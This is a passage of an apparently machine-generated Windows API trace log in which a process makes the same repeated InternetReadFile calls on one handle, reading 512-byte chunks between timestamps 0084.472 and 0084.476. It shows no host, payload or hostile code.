	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.475] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
